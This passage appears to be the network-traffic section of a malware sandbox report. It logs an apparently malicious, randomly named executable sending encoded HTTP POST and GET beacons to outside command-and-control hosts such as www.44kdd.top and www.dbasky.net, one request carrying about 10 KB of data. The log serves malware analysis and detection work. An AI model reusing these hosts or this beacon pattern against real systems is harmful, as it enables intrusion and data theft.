                                                                                                                              Data Ascii: Z0WTZ=osnv7c/A27cFSaIROhlajwO58M3iGeQVmRQoVI4OcI3MbWw2U06WcDPjV/yny1qILqBrg0C+JR03dxoYyuux4tztir273S08Zf/ed8cECb6E3kUKpZKw82T9e4/jKvEPE6YT7HDDWf802omtbv/ONsFwJCXg1rylrFlr9oWNZ5jx4cKdnejm6RoaLKUFotj2HgmCfnW8Cz5Vakzh0junNwElHwsAJVQwikPC8cTyZgBPrPZaOiKQ55DRpcZmnzIfHZDk0U7F1yI9OuO9H+ygH/T7m0cUih/cppFBZjfykippPqlG7P1iJg2JBjgY1bhXNkA5veo1h92aduzAEwkUVBYRsPvPIc8TQMHASZ4T9z9vxVxhq/4+Wo0ZCQw3ioY0+Rqgt5P6yN4+pfZUn2GyNey4vyQRHCmZmy+J9t8QJMUQr79SYR2JhLQVMsRZGV3FUV3eblNf1SucdgGjftO4aH+h6espi7H47vXuQiN8NqBq1AJBZP/6S8ClEw3fmft2gWQ3j5xsh9kYYdzQlz5u2a+tcbI7/yX5is5vd9Y0tRW9dk0bsQr4kJIEhUJH5EhyL/WoM6w5y3pR5uifVeUHut0Jc7Mo0WNZ/Ld/Yfl7NysZTle0Czld5TrmfzbAsx9uJYJOoPdLeRvleuWwwxo8mUbzIAaTUDF6aGxbxs/dV8bczMoF+22/fqNC7SCFBOY/1qI3AZhoTyHziyVbuaFbP3PGupCVcmWvtF3duRbV8nXd3uUfsLwxGLIRPea8HW3ij/C5LJrXw0EprVs5F+pTvTk9DiGyiTC9fG65QwzzcBdfElJ7lItrFUKKy/pnH10UwY4tZ0ya8QxgAmBRkY1YlbAXDZUbI9irLC9WSGDjYalMA7NMUklGOhiRE7EqMMrmk//GEueajlBWdZAFfYIQUe5ot3HboLe32qTbq7KWYAX/QA5Aa4O5MpHwespCtiiTJJCThrBZDChd6kn1L6p5/nae3h28GN2T/qDC2XGuDlwCT9 [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.4493563.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:03.116794109 CET532OUTGET /4q66/?Z0WTZ=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:13:03.761482954 CET399INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:03 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 259
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 30 57 54 5a 3d 6c 75 50 50 34 6f 79 41 2b 49 78 58 61 34 64 50 61 51 34 34 75 54 58 2b 79 6f 6a 35 41 76 30 33 33 51 4d 50 56 4e 49 46 59 4b 43 32 55 6e 74 4a 64 46 48 4f 58 77 57 41 58 2f 37 7a 68 58 6a 49 58 4c 59 71 76 57 65 63 49 53 77 74 55 48 68 7a 31 2b 61 4a 77 62 4b 34 36 71 2f 4b 31 44 55 38 4f 72 50 72 56 2b 67 46 48 59 65 41 33 47 77 38 72 35 2b 66 6c 48 73 3d 26 53 4a 75 50 39 3d 55 50 51 4c 57 52 67 48 41 44 5f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Z0WTZ=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&SJuP9=UPQLWRgHAD_"}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.44935738.47.232.160803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:08.907262087 CET774OUTPOST /wh1i/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Origin: http://www.44kdd.top
                                                                                                                              Referer: http://www.44kdd.top/wh1i/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 41 64 6d 68 2f 50 35 74 41 34 4d 35 57 77 2f 54 45 63 64 6a 6f 68 37 4a 54 4b 37 6d 5a 49 54 38 4f 47 67 41 63 61 79 61 33 72 63 31 78 6e 46 70 73 6f 43 36 6a 55 42 37 75 4d 4f 78 38 68 58 68 6c 56 46 39 6e 74 4a 37 66 78 6b 58 34 58 6a 51 6c 67 6f 62 77 6d 78 43 4c 76 68 78 50 48 64 78 6c 58 74 76 36 66 39 48 62 65 64 41 4b 66 61 44 43 62 50 64 6b 68 38 54 72 71 4c 45 63 31 5a 42 52 33 50 66 74 6a 6c 52 56 54 58 42 62 34 4c 62 54 46 47 78 63 59 38 79 74 63 4e 7a 71 50 52 68 57 41 6a 39 72 75 41 4f 43 46 44 78 54 43 76 67 58 43 76 45 59 70 2b 67 52 73 43 32 47 6e 34 41 4e 77 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=Admh/P5tA4M5Ww/TEcdjoh7JTK7mZIT8OGgAcaya3rc1xnFpsoC6jUB7uMOx8hXhlVF9ntJ7fxkX4XjQlgobwmxCLvhxPHdxlXtv6f9HbedAKfaDCbPdkh8TrqLEc1ZBR3PftjlRVTXBb4LbTFGxcY8ytcNzqPRhWAj9ruAOCFDxTCvgXCvEYp+gRsC2Gn4ANw==
                                                                                                                              Nov 2, 2024 08:13:10.082779884 CET312INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:09 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.44935838.47.232.160803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:11.459292889 CET794OUTPOST /wh1i/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Origin: http://www.44kdd.top
                                                                                                                              Referer: http://www.44kdd.top/wh1i/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 41 64 6d 68 2f 50 35 74 41 34 4d 35 58 55 44 54 47 39 64 6a 39 78 37 47 57 4b 37 6d 4d 34 54 34 4f 47 73 41 63 62 32 4b 33 64 4d 31 2f 6e 31 70 74 70 43 36 75 30 42 37 6d 73 50 37 34 68 58 51 6c 56 35 44 6e 6f 4a 37 66 77 45 58 34 53 66 51 35 43 41 63 77 32 78 41 65 66 68 33 42 6e 64 78 6c 58 74 76 36 66 70 70 62 65 46 41 4b 73 43 44 44 36 50 65 37 52 38 55 73 71 4c 45 4b 46 5a 4e 52 33 4f 36 74 6d 46 2f 56 57 54 42 62 39 33 62 54 52 61 75 56 59 38 6f 77 4d 4d 51 6a 63 49 6d 5a 44 47 77 76 6f 51 6f 46 6d 66 73 53 45 69 36 47 7a 4f 54 4b 70 61 54 4d 72 4c 43 4c 6b 46 4a 57 38 58 63 68 49 42 58 67 54 47 63 58 41 72 64 7a 78 76 77 71 70 63 3d
                                                                                                                              Data Ascii: Z0WTZ=Admh/P5tA4M5XUDTG9dj9x7GWK7mM4T4OGsAcb2K3dM1/n1ptpC6u0B7msP74hXQlV5DnoJ7fwEX4SfQ5CAcw2xAefh3BndxlXtv6fppbeFAKsCDD6Pe7R8UsqLEKFZNR3O6tmF/VWTBb93bTRauVY8owMMQjcImZDGwvoQoFmfsSEi6GzOTKpaTMrLCLkFJW8XchIBXgTGcXArdzxvwqpc=
                                                                                                                              Nov 2, 2024 08:13:13.423067093 CET312INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:13:13.423094988 CET312INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:13:13.423450947 CET312INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:13:13.423636913 CET312INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:12 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.44935938.47.232.160803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:14.009269953 CET10876OUTPOST /wh1i/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Origin: http://www.44kdd.top
                                                                                                                              Referer: http://www.44kdd.top/wh1i/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 41 64 6d 68 2f 50 35 74 41 34 4d 35 58 55 44 54 47 39 64 6a 39 78 37 47 57 4b 37 6d 4d 34 54 34 4f 47 73 41 63 62 32 4b 33 64 45 31 2f 55 39 70 73 4b 61 36 76 30 42 37 6c 73 50 34 34 68 58 33 6c 56 68 48 6e 6f 4e 72 66 31 41 58 36 30 4c 51 70 32 55 63 36 32 78 41 42 50 68 32 50 48 63 6c 6c 58 64 72 36 66 35 70 62 65 46 41 4b 71 47 44 44 72 50 65 35 52 38 54 72 71 4c 41 63 31 59 53 52 33 6e 48 74 6d 41 4b 56 69 6e 42 63 5a 72 62 66 45 47 75 4a 49 38 32 7a 4d 4d 32 6a 63 30 70 5a 44 61 57 76 6f 4d 53 46 68 33 73 53 6a 79 6b 64 44 79 49 53 50 47 73 54 73 76 62 4c 6b 4e 59 52 2b 53 6e 68 71 70 35 2f 43 6d 4f 59 54 50 55 6e 51 2f 41 35 4a 30 63 65 61 64 38 47 68 6b 4f 61 73 35 63 49 55 7a 4d 4c 4a 58 30 73 53 6d 63 33 59 59 51 38 36 59 70 73 46 62 44 4d 7a 5a 73 51 6f 43 65 65 6b 2f 58 64 41 4b 71 77 64 79 41 78 6a 58 65 74 47 63 54 2b 48 57 57 41 55 72 6b 51 6e 31 72 66 36 61 70 78 48 5a 57 75 31 4b 51 30 67 65 2b 7a 70 65 45 63 42 72 61 61 52 75 51 53 35 2b 38 49 4c 75 58 51 58 4e 33 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=Admh/P5tA4M5XUDTG9dj9x7GWK7mM4T4OGsAcb2K3dE1/U9psKa6v0B7lsP44hX3lVhHnoNrf1AX60LQp2Uc62xABPh2PHcllXdr6f5pbeFAKqGDDrPe5R8TrqLAc1YSR3nHtmAKVinBcZrbfEGuJI82zMM2jc0pZDaWvoMSFh3sSjykdDyISPGsTsvbLkNYR+Snhqp5/CmOYTPUnQ/A5J0cead8GhkOas5cIUzMLJX0sSmc3YYQ86YpsFbDMzZsQoCeek/XdAKqwdyAxjXetGcT+HWWAUrkQn1rf6apxHZWu1KQ0ge+zpeEcBraaRuQS5+8ILuXQXN3MyiYObFlttArfuPXoTvbCAEn00sHWOuQuI7Vi0YN4m5WQ1eMtjeCk6dWYMfwsuIZLYQXGsBwVsK+Rco9wBrUC7g+vrLhK4nOm7kKxOdFHVx47wlidCUpX2gNvdY3XtFLS7OzTX4Zd+OF4Bu/OmOXIV47PEk79SR74vfSytz5bJgqZQmFl7KngQ0TprMAM6YCeDPA7fOGa3mornt/YxVDqhpaM1vOvvbc/6j/+kGhUWC3SiaJNnJeGSWODJvLo59rDdZz/RJ3oDS+pjl+M7b16W+tLTWBlTCbM/QY+zDGJZu56PIX4vWs0jqdeN4aqC0cFS+cuWcNwDuoQ3RZ9APYaRbvQ4Qvb+tfag2hCgf711bxo4YOZGUCvA00ZYvuoBZCJvnuqTrivsZN3gZbCKbxJofDmH6HKBkH1QTNA9aLnndXLCl4T5Kk9TiqIYJXBLwe728itgv2DtyDiTkvDvgsGYKUIo2B2nRDy/A/OydSolBA7auzuLr2K418bEQmFw4tacnsEqf39WH4XkBZbyQRc8iqbO7zeCid65kxF04KnFQ0JH3YBO61+3pNCe9V5NuFgc9myhrkE5pHGzkdjx/hVhDkXacLO5GvzKqmrfHyn2hLc5BtFtf1lCqx3hmHrRuC4jQmodqk1PjgVZpJ/DEawUQ0Vk/xB1jBUv [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:13:15.286664009 CET312INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:14 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.44936038.47.232.160803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:16.556499004 CET522OUTGET /wh1i/?Z0WTZ=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.44kdd.top
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:13:17.553376913 CET312INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:17 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 148
                                                                                                                              Connection: close
                                                                                                                              ETag: "66df9c88-94"
                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.44936134.92.109.131803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:23.302743912 CET777OUTPOST /qgza/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Origin: http://www.dbasky.net
                                                                                                                              Referer: http://www.dbasky.net/qgza/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6e 57 33 36 66 49 67 7a 73 75 6a 47 6d 31 50 53 66 2b 58 41 6c 7a 4f 6e 30 33 6a 32 58 6d 68 4b 65 62 61 73 50 4f 6a 33 6a 64 31 45 45 63 38 73 39 45 35 58 50 77 69 36 41 48 37 4e 51 50 43 66 52 72 5a 4b 35 38 45 6c 70 44 4c 73 68 47 33 47 34 35 6b 6a 73 30 7a 4d 69 47 6b 65 48 35 61 4a 36 6b 47 51 49 68 42 66 36 46 6c 49 30 4e 36 50 76 74 75 63 41 6c 62 55 33 51 52 42 56 53 41 78 31 6b 4a 32 4f 46 69 76 69 55 48 73 4d 38 2f 75 37 6b 76 32 75 4e 49 45 71 53 56 32 38 7a 64 69 61 61 2b 78 39 36 51 7a 56 52 48 43 6b 42 71 6c 56 4c 74 2b 44 4e 61 31 34 32 54 2f 6d 62 6e 31 6c 67 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=nW36fIgzsujGm1PSf+XAlzOn03j2XmhKebasPOj3jd1EEc8s9E5XPwi6AH7NQPCfRrZK58ElpDLshG3G45kjs0zMiGkeH5aJ6kGQIhBf6FlI0N6PvtucAlbU3QRBVSAx1kJ2OFiviUHsM8/u7kv2uNIEqSV28zdiaa+x96QzVRHCkBqlVLt+DNa142T/mbn1lg==
                                                                                                                              Nov 2, 2024 08:13:24.274424076 CET289INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:24 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 146
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.44936234.92.109.131803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:25.852111101 CET797OUTPOST /qgza/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.dbasky.net
                                                                                                                              Origin: http://www.dbasky.net
                                                                                                                              Referer: http://www.dbasky.net/qgza/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
